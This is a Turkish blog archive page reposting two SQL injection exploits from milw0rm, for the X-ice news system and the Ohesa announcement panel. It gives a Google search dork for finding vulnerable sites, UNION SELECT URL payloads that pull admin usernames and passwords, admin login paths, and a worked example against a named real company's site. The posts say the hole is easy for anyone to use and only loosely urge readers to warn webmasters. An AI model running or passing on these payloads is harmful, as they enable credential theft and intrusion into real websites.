Arşiv

Archive for the ‘SqL injection’ Category

X-ice News System Remote SqL Injection

02/08/2009 Yorum yapın

Basit bir açık, herkez kullanabilir; fakat Türk webmaster’ların bu açığı kapatması için uyarı notlarınızı bırakmanızı öneririm, çok eski açık ama google’da yüzlerce site var..

X-ice haber, duyuru paneLi açığı

Arama k0du:  inurl:devami.asp

Vuln.

Username : /devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin
Password : /devami.asp?id=-1+union+select+0,sifre,2,3,4,5,6,7+from+admin

Login : /admin/kontrol.asp

Kaynak:

# milw0rm.org

http://www.milw0rm.com/exploits/3469

Categories: SqL injection

Ohesa Duyuru PaneLi SqL Injection

02/08/2009 Yorum yapın

#-#  Title            : Ohese Duyuru PaneLi SqL Injection 
                                                                         
#-#  Script Download  : http://www.aspindir.com/goster/5223   

#-# exploit: /izle.asp?id=-999 union select 0,kullanici,sifre,3 from yonetim   

http://www.site.com/path/izle.asp?id=-999 union select 0,kullanici,sifre,3 from yonetim   
                                                                             
user and passw0rd !                 
                                                                               
admin paneL :     admin/giris.asp 

Örnek //

 http://www.mol-elastomer.com.tr/duyuru/izle.asp?id=-999%20union%20select%200,kullanici,sifre,3%20from%20yonetim

Türk SiteLerini Uyarın, iyi ŞansLar :)

Categories: SqL injection
Takip Et

Get every new post delivered to your Inbox.